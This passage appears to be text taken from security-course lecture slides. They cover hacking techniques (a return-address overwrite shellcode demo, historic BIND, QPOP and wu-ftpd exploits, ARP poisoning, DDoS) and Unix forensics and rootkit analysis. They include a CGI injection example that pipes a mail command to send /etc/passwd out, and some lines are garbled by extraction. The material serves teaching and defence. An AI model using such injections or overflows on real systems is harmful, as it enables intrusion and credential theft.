0xfffffffc(ebp),eax // load ax from ret value
lea 0x8(eax),edx // offset two
address and load to dx mov edx,0xfffffffc(ebp
) // update the ret variable in the stack mov
0xfffffffc(ebp),eax // move the ret value to
ax movl 0x8049440,(eax) // move 0x8049440
value to // stack position pointed by ax
leave ret nop
esp
ret variable 0xbffff98c
0xbffff984
0xbffff9a8
ebp
0xbffff988
0x8049440
0xbffff98c
Return address
Bottom of the stack
63
source code of main void main() int ret
ret (int )ret 2 (ret)
(int)shellcode
assembler code of main push ebp mov
esp,ebp sub 0x4,esp lea
0xfffffffc(ebp),eax // load ax from ret value
lea 0x8(eax),edx // offset two
address and load to dx mov edx,0xfffffffc(ebp
) // update the ret variable in the stack mov
0xfffffffc(ebp),eax // move the ret value to
ax movl 0x8049440,(eax) // move 0x8049440
value to // stack position pointed by ax
leave ret nop
ret variable 0xbffff98c
0xbffff984
0xbffff9a8
0xbffff988
0x8049440
0xbffff98c
Return address
esp
ebp
0xbffff9a8
Bottom of the stack
64
Lab 4 Hacking Techniques

• Examples of remote root exploit through buffer
  overflow
• QPOP 3.0beta AUTH remote root stack overflow
• BIND 8.2 - 8.2.2 remote root exploit

65
Lab 4 Hacking Techniques

• Examples of remote root exploit through buffer
  overflow
• QPOP 3.0beta AUTH remote root stack overflow
• The popper server program (QPOP 3.0beta) runs
  with root privileges so it can act on behalf of
  users accessing their mail using the POP
  protocol. Due to insufficient bounds checking on
  its input it is possible to cause a buffer
  overrun in the popper program while it is
  executing. By supplying carefully designed input
  attackers may be able to force the program to
  execute arbitrary commands.

66
Lab 4 Hacking Techniques

• Examples of remote root exploit through buffer
  overflow
• BIND 8.2 - 8.2.2 remote root exploit Some
  versions of BIND fail to properly validate NXT
  records. This improper validation could allow an
  intruder to overflow a buffer and execute
  arbitrary code with the privileges of the name
  server. NXT record support was introduced in BIND
  version 8.2. Prior versions of BIND, including
  4.x, are not vulnerable to this problem. The
  ISC-supplied version of BIND corrected this
  problem in version 8.2.2.

67
Lab 4 Hacking Techniques

• Examples of remote root exploit through unhandled
  input
• Most programs are written to handle valid input.
  Most programmers do not consider what happens
  when somebody enters input that doesn't match the
  specification.

68
Lab 4 Hacking Techniques

• Examples of remote root exploit through unhandled
  input
• Wu-ftpd vulnerability
• The wu-ftpd "site exec" vulnerability is the
  result of missing character-formatting argument
  in several function calls that implement the
  "site exec" command functionality. If a malicious
  user can pass character format strings consisting
  of carefully constructed printf() conversion
  characters (f, p, n, etc) while executing a
  "site exec" command, the ftp daemon may be
  tricked into executing arbitrary code as root.

69
Lab 4 Hacking Techniques

• Local root exploit through SUID
• On Unix systems, the "suid" bit on a system
  executable program allows the program to execute
  as the owner. A program that is setUID to "root"
  will allow the program to execute with root
  privileges.

70
Lab 4 Hacking Techniques

• Local root exploit through SUID
• An example of local root exploit through dump
  SUID program
• Some implementations of the Linux backup
  utility, dump, permit use of backup devices on
  remote machines via an access program on the
  local machine. This access program is identified
  in the RSH environment variable. The value in the
  environment variable is not validated for
  security prior to its use in calling a program.

71
Lab 4 Hacking Techniques

• Local root exploit through SUID
• An example of local root exploit through LBL
  traceroute
• This example shows how heap mismanagement is
  fatal. The local root exploit is done by
  overflowing a malloc()'ed buffer in the
  traceroute program. In the case of traceroute,
  there was a reliable way of making traceroute
  call free() on a pointer that was not obtained
  with malloc().

72
Lab 4 Hacking Techniques

• Examples of CGI exploit
• Using Unexpected combinations
• Intruders can often send input that is
  meaningless to one layer, but meaningful to
  another layer. A common hacking technique would
  be to enter something like " mail lt
  /etc/passwd". The operating system intercepts the
  pipe '' character and launches the 'mail'
  program as well, which causes the password file
  to be emailed to the intruder.

73
Lab 4 Hacking Techniques

• Sniffer
• Sniffer refers to a wiretap that eavesdrops on
  computer networks. You have to be between the
  sender and the receiver in order to sniff traffic

74
Lab 4 Hacking Techniques

• Sniffer
• A packet sniffer is a wire-tap devices that
  plugs into computer networks and eavesdrops on
  the network traffic. Like a telephone wiretap
  allows the FBI to listen in on other people's
  conversations, a "sniffing" program lets someone
  listen in on computer conversations.

75
Lab 4 Hacking Techniques

• Sniffer
• Components of a packet sniffer
• The hardware
• Capture driver
• Buffer
• Real-time analysis
• Decode
• Packet editing/transmission

76
Lab 4 Hacking Techniques

• ARP POISONING
• The arp protocol has an intrinsic insecurity.
  In order to reduce the traffic on the cable, it
  will insert an entry in the arp cache even if it
  hadn't request it. In other words, EVERY arp
  reply that goes on the wire will be inserted in
  the arp table.

77
Lab 4 Hacking Techniques

• ARP POISONING
• Hackers can send fake arp replies to the two
  hosts they want to sniff. They will tell that
  the mac address of the second host is the one
  hard-coded on their ethernet card. This host will
  now send packets that should go to the first
  host, to them, because he carries their mac
  address.

78
Lab 4 Hacking Techniques

• ARP POISONING

79
Lab 4 Hacking Techniques

• A normal SSL connection is protected by session
  keys

80
Lab 4 Hacking Techniques

• MAN-IN-THE-MIDDLE ATTACK in SSL connection

81
Lab 4 Hacking Techniques

• DDoS (Distributed Denial of Service)
• A DDoS attack is one that pits many machines
  against a single victim. An example is the
  attacks of February 2000 against some of the
  biggest websites. Even though these websites have
  a theoretical bandwidth of a gigabit/second,
  distributing many agents throughout the Internet
  flooding them with traffic can bring them down.

82
Lab 4 Hacking Techniques

• DDoS attack Model

83
Lab 4 Hacking Techniques

• DDOS Counter Measures
• Setting Egress (packets arriving from the
  Internet) and Ingress (packet originating from
  your network) Filtering in your router
• For examples 
• Egress Filtering
• access-list 110 permit ip 10.3.0.0 0.0.255.255
  any
• access-list 110 deny ip any any log
•  
• Ingress Filtering
• access-list 111 deny ip host 0.0.0.0 any log
• access-list 111 deny ip 127.0.0.0 0.255.255.255
  any log
• access-list 111 deny ip 172.16.0.0 0.15.255.255
  any log
• access-list 111 deny ip 192.168.0.0 0.0.255.255
  any log
• access-list 111 deny ip 10.3.0.0 0.0.255.255 any
  log
•  

84
Lab 4 Hacking Techniques

• DDOS Counter Measures
• Set TCP Intercept Feature in your router
• For example,
• ip tcp intercept max-incomplete high VALUE
• When the number of incomplete connections
  reaches the VALUE, router enter the aggressive
  mode and time out the incomplete connections.
• ip tcp intercept one-minute high VALUE  
• When VALUE number of connection attempts have
  been received in the last minute, route enters
  aggressive mode

85
Lab 4 Hacking Techniques

• Back Door Establishment
• Interactive access
• have direct tcp connection (e.g. inetd or BIND
  NXT vulnerability)
• Semi-interactive access
• One way communication (e.g. TFN)
• Non-interactive access
• control the captured host by e-mail or post news
  (e.g Trojan Horse)

86
Lab 4 Hacking Techniques

• Real Cases Studies
• ADM Hacking (Jan 2000)
• BIND 8.2 NXT BUG Hacking (Feb 2000)
• DDoS Attack (Nov 2000)
• Code Red and Nimda Attack (August/September 2001)
  

87
Lab 5 Computer Forensics Analysis

• Basic Techniques
• Verify Incident
• Isolate the true ones from false alarm
• Escalation process

88
Lab 5 Computer Forensics Analysis

• Basic Techniques
• Secure Incident Scene
• Limit the amount of activity on the system to as
  little as possible
• Isolation
• One person perform action
• Record your actions
• Power off VS Keeping it power on
• Unplug the network VS Keeping it on line

89
Lab 5 Computer Forensics Analysis

• Basic Techniques
• Collect evidence
• Snapshot the scene
• backup the system to media

90
Lab 5 Computer Forensics Analysis

• Basic Techniques
• Find clues and Analyze the Unknown
• Think as hackers
• Reconstruct the scene
• Network, process and file analysis

91
Lab 5 Computer Forensics Analysis

• Basic Techniques
• Equipment Needed
• Luggable PC and laptop with
• different boot OS platform (e.g. Window or Unix)
• forensics tools
• SCSI and IDE removable drives
• TAPE drive
• You may use these PC and laptop as backup media,
  sniffer and a small lab for file and process
  analysis
• floppy and CDROM loaded with forensics tools

92
Lab 5 Computer Forensics Analysis

• On-line inspection
• Clone the disk and copy data
• Efficiency VS Accuracy
• Copying the data to a remote host for later
  investigation
• Using cp -p to preserve the owner and group id,
  permissions modes, modification and access time
• Copying the data to a remote host by ttcp or nc
• Clone to other disk by dd

93
Lab 5 Computer Forensics Analysis

• On-line inspection
• Memory Dump
• dd if /dev/kmem ofoutput
• dd if /dev/mem ofoutput
• Process Investigation
• /bin/ps auxeww (view process environment)
• lsof p pid ( view process opening files)
• ltrace p pid (trace process library call)
• strace p pid (trace process system call)
• pcat pid gt dumpfile (dump process image to a
  file)

94
Lab 5 Computer Forensics Analysis

• On-line inspection
• Recovering files from Kernel through /proc
  directory
• Each running process has a corresponding
  directory in /proc by the name of its pid. You
  can review various process information in this
  directory. You can also recover the process
  binary file even it has been deleted from the
  hard disk.

95
Lab 5 Computer Forensics Analysis

• On-line inspection
• Collect Network Information
• Check the network connection (netstat)
• List current open port (lsof i)
• Trace a host (traceroute)
• Trace the MAC (arp)

96
Lab 5 Computer Forensics Analysis

• On-line inspection
• Surveillance
• Activate the lastcomm log
• Check the .history file
• Act a middle man to intercept traffic
• Get x-win display
• Log the tty sessioin

97
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Check the MAC time
• modify, access and status changed time stamp
• find -mtimeatimectime
• ls -ltlut

98
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Check the log files
• The log files (syslog, messages, secure , mail,
  wtmp, utpmp, lastlog ...) in /var/adm , /var/log.
  Theese log files location is usually specified in
  /etc/syslog.conf

99
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Check the log files
• messagesThe messages log will contain a wide
  variety of information. Look for anomalies in
  this file. Anything out of the ordinary should be
  inspected. Also, look for events that occurred
  around the known time of the intrusion.

100
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Check the log files
• xferlogIf the compromised system has a
  functioning ftp server, xferlog will contain log
  files for all of the ftp transfers. This may help
  you discover what intruder tools have been
  uploaded to your system, as well as what
  information has been downloaded from your system.

101
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Check the log files
• utmpThis file contains binary information for
  every user currently logged in. This file is only
  useful to determine who is currently logged in.
  One way to access this data is the who command.

102
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Check the log files
• wtmpEvery time a user successfully logs in, logs
  out, or your machine reboots, the wtmp file is
  modified. This is a binary file thus, you need
  to use a tool to obtain useful information from
  this file. One such tool is last. The output from
  last will contain a table which associates user
  names with login times and the host name where
  the connection originated. Checking this file for
  suspicious connections (e.g., from unauthorized
  hosts) may be useful in determining other hosts
  that may have been involved and finding what
  accounts on your system may have been
  compromised.

103
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Check the log files
• secureSome versions of UNIX (RedHat Linux for
  example) log tcp wrapper messages to the secure
  log file. Every time a connection is established
  with one of the services running out of inetd
  that uses tcp wrappers, a log message is appended
  to this log file. When looking through this log
  file, look for anomalies such as services that
  were accessed that are not commonly used, or for
  connections from unfamiliar hosts.

104
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Check if any files are infected
• Find any suspicious setuid and setgid files
  (especially setuid root files) everywhere on your
  system. Intruders often leave setuid copies of
  /bin/sh or /bin/time around to allow them root
  access at a late time.
• E.G.
• find / -user root -perm -4000 -print -xdev
• find / -group kmem -perm -2000 -print -xdev

105
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Exam user cron jobs
• Check the /var/spool/cron directory for any
  suspicious cron jobs as they can be used by the
  hackers as backdoor. Also, verify that all
  files/programs referenced (directly or
  indirectly) by the 'cron' jobs, and the job files
  themselves, are not world-writable

106
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Exam user .forward jobs
• If you really allow your users to execute
  program through .forward, you need to check if
  these program is normal and not setuid

107
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Reverse engineering of suspicious program
• Check its symbol table (nm -p program_file)
• Check runtime linker symbol table - calls of
  shared library routines (nm -Du program_file )
• print shared library dependencies (ldd
  binary_file )
• print the strings of printable characters in
  files (strings binary_file )

108
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Reverse engineering of suspicious program
• A library call tracer (ltrace binary_file )
• trace system calls and signals (strace
  binary_file )
• display information from object files (objdump -x
  binary_file)

109
Lab 5 Computer Forensics Analysis

• Off-line inspection
• Recovery and exam of removed files (not from back
  up tape)
• View the removed filename in the directory od
  -cx or od -cl directory
• Calculate its inode position
• icat the file directly from the file system
• Use ils to get the last status of the removed
  file
• Recover the removed file by icat

110
Lab 5 Computer Forensics Analysis

• inode structure

111
Lab 5 Computer Forensics Analysis
112
Lab 5 Computer Forensics Analysis

• Rootkit analysis
• After hackers have broken into a host, they may
  also install some trojaned programs (rootkit) to
  cover their trace.
• he 't0rnkit' rootkit mentioned in CERT
  Incident Note IN-2000-10 Widespread Exploitation
  of rpc.statd and wu-ftpd Vulnerabilities will be
  used of demonstration in this la.

113
Lab 5 Computer Forensics Analysis

• Rootkit analysis
• This rootkit include the following trojaned
  programs to replace the original ones in the
  break-in host
• /bin/login
• general user get root shell
• /sbin/ifconfig
• hide promiscuous mode of the interface when
  running sniffer program
• /bin/ps
• hide process names specified in .1proc file
• /usr/bin/du
• hide files/directories specified in .1file file

114
Lab 5 Computer Forensics Analysis

• Rootkit analysis
• /bin/ls
• hide files/directories specified in .1file file
• /bin/netstat
• hide network connection specified in .1addr file
  /usr/sbin/in.fingerd - general user get root
  shell
• /usr/bin/find
• hide files/directories specified in .1file file
  /usr/bin/top - hide process names specified in
  .1proc file
• /usr/bin/top
• hide process names specified in .1proc file

115
Lab 5 Computer Forensics Analysis

• Rootkit analysis
• This rootkit also comes with the sniffer program
  (t0rn) and log eraser program (t0rnsb) which can
  erase a specified entry in most of the system log
  files, says log files in /var/log.

116
Lab 5 Computer Forensics Analysis

• Rootkit analysis
• Never trust any program at the suspected host.
  Use your trusted program from your CDROM or
  floppy disk. However, is the host kernel is also
  trojaned, then this cannot help under this
  situation.